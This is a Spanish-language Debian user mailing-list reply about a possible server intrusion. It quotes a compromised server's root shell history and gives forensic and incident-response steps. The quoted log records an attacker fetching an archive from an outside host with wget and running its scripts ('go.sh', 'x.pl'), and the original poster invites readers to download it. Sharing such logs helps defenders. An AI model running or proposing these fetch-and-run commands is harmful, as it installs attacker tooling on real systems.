[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Posible intrusión un server



El día 13 de mayo de 2011 08:39, ciracusa <ciracusa@gmail.com> escribió:
> Lista, buenas tardes.
>
> Perdón si este tema no esta directamente relacionado con Debian, pero como
> el server en cuestión tiene Squeeze y es un tema de seguridad creo que puede
> interesarles a mas de uno.
>
> Ayer viendo el history de root de un servidor veo lo siguiente:
>
>  314  ./go.sh 189
>  315  w
>  316  cd
>  317  cd /var/tmp/
>  318  rm -rf gosh
>  319  ls -a
>  320  exit
>  321  cat /proc/cpuinfo
>  322  passwd
>  323  cd /var/tmp/
>  324  cd gosh
>  325  touch bios.txt
>  326  chmod +x *
>  327  screen
>  328  exit
>  329  cat /proc/cpuinfo
>  330  cd /var/tmp/
>  331  ls -a
>  332  wget http://gblteam.webs.com/gosh.tgz.tar
>  333  tar zxvf gosh.tgz.tar
>  334  rm -rf gosh.tgz.tar
>  335  cd gosh
>  336  touch bios.txt
>  337  chmod +x *
>  338  ./go.sh 200
>  339  cd
>  340  cd /var/tmp/
>  341  ls -a
>  342  rm -rf gosh
>  343  ls -a
>  344  exit
>  345  cd /var/tmp/
>  346  perl x.pl
>
>
> Que opinan?

Yo, haria una imagen para analisis forense!
Luego, que servicios tenes?
Si es apache y tenes php; busca en el log de apache y alli encontraras
la respuesta de como entraron.
Luego, # last y veras si llego a root.
Si usas ssh con contrasena, podrias probar a loguearte en terminal
remota y sin meter la contrasena; trata de entrar por sftp; la
posibilidad es de aprox. 1/25.
Chequea las ultimas vulnerabilidades en http://www.exploit-db.com
Si usas tripwire y tenes la base en remoto; comparala con la del
servidor, para descubrir el culpable.
Pasale chkrootkit y chkhunterdesde una live, para saber que bichos tenes.
Y por ultimo, nada de lo que tengas alli, es confiable; asi como los
backups, hasta que descubras el momento exacto de la intrusion.

hasta pronto.

PD:
El uso de paquetes de terceros, es uno de los mayores riesgos; asi
como a mas capas de software, mayor riesgo.
.
>
> Entiendo -lamentablemente- que el server fue comprometido, pero lo que no
> llego a comprender es el alcance de esto.
>
> Notar que puse el link para que puedan descargarlo uds. también y analizarlo
> (tomando las precauciones del caso).
>
> Bueno, si alguien tiene algo de info muy agradecido.
>
> Y si pueden recomendarme algunos pasos para analizar la seguridad del server
> desde ya muchas gracias.
>
> Salu2.
>
>
> --
> To UNSUBSCRIBE, email to debian-user-spanish-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact
> listmaster@lists.debian.org
> Archive: 4DCD50CC.3030902@gmail.com">http://lists.debian.org/4DCD50CC.3030902@gmail.com
>
>


Reply to: